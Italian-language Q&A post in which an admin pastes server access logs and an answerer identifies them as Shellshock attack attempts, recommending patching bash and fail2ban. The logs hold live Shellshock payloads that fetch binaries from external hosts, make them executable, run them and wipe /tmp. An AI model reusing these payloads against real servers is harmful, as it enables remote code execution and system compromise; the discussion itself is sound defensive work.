Preoccupante log di accesso httpd [duplicato]

2

quindi dopo aver configurato un nuovo server con solo ssh (solo chiave pubblica) e un server web che serve solo un index.html, sono partito per il fine settimana. Effettuare il login lunedì vedo questo tipo di cose nel mio httpd access_logs

5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 215 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"

e

61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

e molto altro ancora. Specialmente questo ragazzo China.Z era molto insistente. Praticamente capisco di cosa si tratta, che stanno sondando la mia macchina e stanno cercando di ottenere informazioni a riguardo (giusto?) Ma

  • durante il fine settimana, quando non ci sarebbe stato traffico sulla macchina (come ho detto, non c'è niente da fare) ci sono stati circa 200mb di traffico in uscita
  • link
  • alcune di queste richieste hanno restituito 200 (i "/" per esempio), dovrei essere preoccupato?

Questi due esempi sono in effetti tentativi più grandi, con molte richieste dallo stesso IP, ma ce ne sono molti altri con una sola richiesta / IP.

Quindi, dovrei preoccuparmi di questo? Ho chiuso il mio apache e chiuso anche le porte rilevanti nel firewall, ma avrò bisogno di apache in esecuzione su questa macchina. Inoltre, c'è qualcosa che posso / dovrei fare per impedirlo?

Inoltre: questa macchina è rivolta a Internet e ha un IP fisso, suppongo che sia per questo che mi sto facendo male.

Grazie:)

    
posta peph 07.04.2015 - 18:16
fonte

1 risposta

6

Sei colpito dai tentativi di Shellshock. Finché hai corretto la tua bash, dovresti essere al sicuro contro questi tentativi. Tuttavia, potresti voler investire in un sistema per vietare i ripetitori del sistema. Prova fail2ban.

Qual è un esempio specifico di come sfruttare il bug di Shellshock Bash?

Se non hai bash patchato, sei in grossi guai.

    
risposta data 07.04.2015 - 18:39
fonte

Leggi altre domande sui tag